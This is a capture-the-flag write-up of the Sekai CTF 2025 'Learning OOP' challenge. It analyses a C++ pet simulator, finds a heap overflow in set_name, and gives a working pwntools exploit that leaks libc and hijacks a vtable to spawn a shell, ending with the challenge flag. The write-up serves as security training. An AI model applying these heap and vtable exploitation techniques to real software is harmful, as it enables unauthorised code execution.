Sekai CTF 2025 - Learning OOP

Author: naup96321

analyze

This is one cpp pwn challenge.

int main(int argc, char *argv[]) {
    init();

    int choice = 0;
    while(1) {
        menu();
        std::cin >> choice;
        if(!std::cin.good()) {
            std::cout << "I/O Error" << std::endl;
            return EXIT_FAILURE;
        }
        switch(choice) {
            case 1:
                new_pet();
                break;
            case 2:
                play_with_pet();
                break;
            case 3:
                feed_pet();
                break;
            case 4:
                rest_pet();
                break;
            case 5:
                if(num_pets != 0) {
                    std::cout << "No, you still have pets. You cant abandon them :(" << std::endl;
                    break;
                }
                std::cout << "Bye bye" << std::endl;
                return 0;
            default:
                std::cout << "You did nothing" << std::endl;
                break;
        }
        update();
    }
    return 0;
}

It have four functions.

• new pet
• play pet
• feed pet
• rest pet

If you call new pet
This function allows the user to create a new pet.
And its object will store to pets[]
User can choose one of four animals: Dog, Cat, Parrot, or Horse.

#define MAX_PET_COUNT 10

void new_pet() {

    int pet_choice = 0;
    if(num_pets >= MAX_PET_COUNT) {
        std::cout << "You have too many pets already" << std::endl;
        return;
    }
    std::cout << "Choose pet species (1=Dog, 2=Cat, 3=Parrot, 4=Horse): ";
    std::cin >> pet_choice;
    if(!std::cin.good()) {
        std::cout << "I/O Error" << std::endl;
        exit(EXIT_FAILURE);
    }
    Animal* new_pet = nullptr;
    switch(pet_choice) {
        case 1:
            new_pet = new Dog();
            break;
        case 2:
            new_pet = new Cat();
            break;
        case 3:
            new_pet = new Parrot();
            break;
        case 4:
            new_pet = new Horse();
            break;
        default:
            std::cout << "Invalid!" << std::endl;
            return;
    }

    new_pet->set_name();
    for(size_t i = 0; i < MAX_PET_COUNT; i++) {
        if(pets[i] == nullptr) {
            pets[i] = new_pet;
            break;
        }
    }
    num_pets++;
    std::cout << "Adopted new pet: " << new_pet << std::endl; // TODO: fix
    return;
}

The Animal base class defines shared properties and behaviors for all pets, while each derived class overrides play(), eat(), and sleep() with species-specific behavior.

class Animal {
    public:
        Animal() {
            memset(this->name, 0x41, sizeof(this->name));
            this->age = 0;
            this->fullness = 10;
            this->status = Status::FULL | Status::WELLRESTED;
        }
        virtual void eat() {
            std::cout << "NOM" << std::endl;
            this->fullness = 20;
            this->status |= Status::FULL;
        }
        virtual void sleep() {
            std::cout << "ZZZ" << std::endl;
            this->status |= Status::WELLRESTED;
        }
        virtual void play() {
            std::cout << "Played with " << this->name << std::endl;
            this->status = 0;
        }
        virtual constexpr size_t get_max_age() = 0; // pure virtual function
        int age_up() {
            return ++this->age;
        }
        int fullness_down() {
            return --this->fullness;
        }
        void set_name() {
            std::cout << "Enter name: " << std::endl;
            std::cin >> this->name;
        }
        char* get_name() {
            return this->name;
        }
        int get_status() {
            return this->status;
        }
        void die() {
            std::cout << this->name << " died :(" << std::endl;
            return;
        }
    protected:
        char name[0x100];
        int age;
        int fullness;
        int status;
};

class Dog : public Animal {
    public:
        constexpr size_t get_max_age() override { return 25; }
        void play() {
            std::cout << this->name << " says: woof woof!" << std::endl;
            this->status = 0;
        }
};

class Cat : public Animal {
        constexpr size_t get_max_age() override { return 20; }
        void play() {
            std::cout << this->name << " says: meow." << std::endl;
            this->status = 0;
        }
        void sleep() {
            std::cout << this->name << " slept for 20 hours." << std::endl;
            this->status |= Status::WELLRESTED;
        }
};

class Parrot : public Animal {
        constexpr size_t get_max_age() override { return 14; }
        void play() {
            std::cout << this->name << " says: give me 10000$ for the flag!" << std::endl;
            this->status = 0;
        }
        void eat() {
            std::cout << "Polly want a cracker!" << std::endl;
            this->status |= Status::FULL;
        }
};

class Horse : public Animal {
        constexpr size_t get_max_age() override { return 40; }
        void play() {
            std::cout << "UMAZING!!!" << std::endl;
            this->status = 0;
        }
        void eat() {
            std::cout << "UMAI!!!!" << std::endl;
            this->status |= Status::FULL;
        }
        void sleep() {
            std::cout << "UMAAAANTUK!!!!" << std::endl;
            this->status |= Status::WELLRESTED;
        }
};

The update() function simulates the passage of time for all pets. Each call ages them and reduces their fullness. Pets die when either their fullness reaches 0 or they exceed their maximum age.

void update() {

    for(size_t i = 0; i < MAX_PET_COUNT; i++) {
        Animal* pet = pets[i];
        if(pet != nullptr) {
            if(pet->fullness_down() == 0 || pet->age_up() > pet->get_max_age()) {
                pet->die();
                delete pet;
                pets[i] = nullptr;
                num_pets--;
            }
        }
    }
    return;
}

attack

set_name have heap overflow.

    void set_name() {
        std::cout << "Enter name: " << std::endl;
        std::cin >> this->name;
    }
    char* get_name() {
        return this->name;
    }
    int get_status() {
        return this->status;
    }
    void die() {
        std::cout << this->name << " died :(" << std::endl;
        return;
    }
protected:
    char name[0x100];
    int age;
    int fullness;
    int status;

First, let me know the chunk layout of the Animal object.
We can easily to control pc by hijack vtable.

+---------------------------+ <-- chunk base (prev_size)
| prev_size (unused)        |
+---------------------------+
| size | 0x120 (chunk size) |  <-- includes metadata + user data
+---------------------------+
| vptr -> Animal vtable     |  <-- virtual table pointer (8 bytes)
+---------------------------+
| name[0x100]               |  <-- 256 bytes
+---------------------------+
| age (4)                   |
+---------------------------+
| fullness (4)              |
+---------------------------+
| status (4)                |
+---------------------------+
| padding (4)               |  <-- to align total size to 8
+---------------------------+

And I want to try to leak libc.
we can overflow and overwrite the next chunk’s size.
Overwrite this chunk’s size to 0x481, it will align the header of one of the chunks you create.

After you finish overwriting the chunk size and the pet dies, we can free it to place the chunk into the unsorted bin.

Then, by adding another animal, malloc will allocate a chunk from the unsorted bin, causing its fd and bk pointers to overwrite another animal’s chunk.
When this animal dies during update(), its name will be printed on the screen. Since its name now points into libc, we can use this to leak a libc address.

mov rdi, qword ptr [rax + 0x640] ; call qword ptr [rax + 0x638]

When we call the get_max_age() function from update(), rax contains the vtable address (the vtable pointer stored on the heap address).

So change vtable pointer on heap address + 0x638 to system
+ 0x640 to /bin/sh address

Create a fake vtable on the heap and set the get_max_age pointer to point to my gadget

Then overwrite an animal’s vtable pointer to point to the fake vtable. When get_max_age() is called, it will execute system("/bin/sh").
However, currently rsp is not 16-byte aligned.

system will call do_system

First, it will push r13. Maybe we can pass this instruction and let rsp 16-byte aligned.

Get shell ~

exploit

from pwn import *
import time

def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)

def p(r):
    gdb.attach(r)

def p_c(r,cmd):
    gdb.attach(r,cmd)

def split_nc(nc_str):
    nc_str=nc_str.split(" ")
    return [nc_str[1],nc_str[2]]

context(arch = 'amd64', os = 'linux')

REMOTE_LOCAL=input("local?(y/n):")

if REMOTE_LOCAL=="y":
    r = process('./learning_oop')
    a=input('open debug?(y/n/srop)')
    if a=='y':
        context.log_level = 'debug'
        context.terminal = ['tmux', 'splitw', '-h']

    elif a=='srop':
        context.log_level = 'debug'
        context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']
    
else:                                           
    REMOTE_INFO=split_nc("nc learning-oop-3a0rjoohqz0x.chals.sekai.team 1337")

    REMOTE_IP=REMOTE_INFO[0]
    REMOTE_PORT=int(REMOTE_INFO[1])

    r=remote(REMOTE_IP,REMOTE_PORT, ssl=True)

### attach
if input('attach?(y/n)') == 'y':
    p(r)

### heap I/O
def create(animal, name):
    sla(b"> ", b"1")
    sla(b"Choose pet species (1=Dog, 2=Cat, 3=Parrot, 4=Horse): ", str(animal).encode())
    sla(b"Enter name:", name)

def play(animal):
    sla(b"> ", b"2")
    sla(b"Which pet?", str(animal).encode())

def feed(animal):
    sla(b"> ", b"3")
    sla(b"Which pet?", str(animal).encode())

def rest(animal):
    sla(b"> ", b"4")
    sla(b"Which pet?", str(animal).encode())

### exploit

create(1, b"a" * 0x100 + p32(0x6) + p32(0x6))
create(3, b"b" * 0x100 + p32(0x5) + p32(0x5))


create(2, b"a" * 0x100 + p32(0x7) + p32(0x7)) #2
create(2, b"b" * 0x100 + p32(0x6) + p32(0x6)) #3
create(2, b"c" * 0x100 + p32(0x5) + p32(0x5)) #4
create(2, b"d" * 0x100 + p32(0x4) + p32(0x4)) #5


create(3, b"c" * 0x100 + p32(0x2) + p32(0x2)) #0
create(1, b"d" * 0x100 + p32(0x10) + p32(0x10) + b"a" * 0x8 + p64(0x481)) #1

create(2, b"A" * 0x30)


rcls(2)
leaklibc = u64(rc(6).ljust(8, b"\x00"))
libcbase = leaklibc - 0x203b20
print("leaklibc : ", hex(leaklibc))
print("libcbase : ", hex(libcbase))

'''
0x000000000009ca97 : mov rdi, qword ptr [rax + 0x640] ; call qword ptr [rax + 0x638]
0x00000000001cb42f : /bin/sh
0x000000000009ca87 : mov rdi, qword ptr [rax + 0x640] ; call qword ptr [rax + 0x638]
'''

libc_binsh = libcbase + 0x1cb42f

if REMOTE_LOCAL == "y":
    mov_rdi_and_etc = libcbase + 0x9ca87
else:
    mov_rdi_and_etc = libcbase + 0x9ca97


if REMOTE_LOCAL == "y":
    libc_system = libcbase + 0x582c2 
else:
    libc_system = libcbase + 0x582d2


create(1, p64(mov_rdi_and_etc) * 4 + b"W" * 0x80 + p32(5) + p32(5) + p64(3) + b"M" * 0x580 + p64(libc_system) + p64(libc_binsh))
fake_vtable = int(rcls(2)[1].split(b": ")[1].strip(), 16) + 0x8

create(1, p64(mov_rdi_and_etc) * 0x8)
create(1, b"Y" * 0x100 + p32(0x5) + p32(0x5) + p64(0x3) + p64(0x121) + p64(fake_vtable))

print("fake_vtb : ", hex(fake_vtable))

### interactive
ita()

# SEKAI{W*Wi!iI!Iii_UM4Z1NG_3xpl0it_sk1llz!!!!}

after all

More challenges will do it later~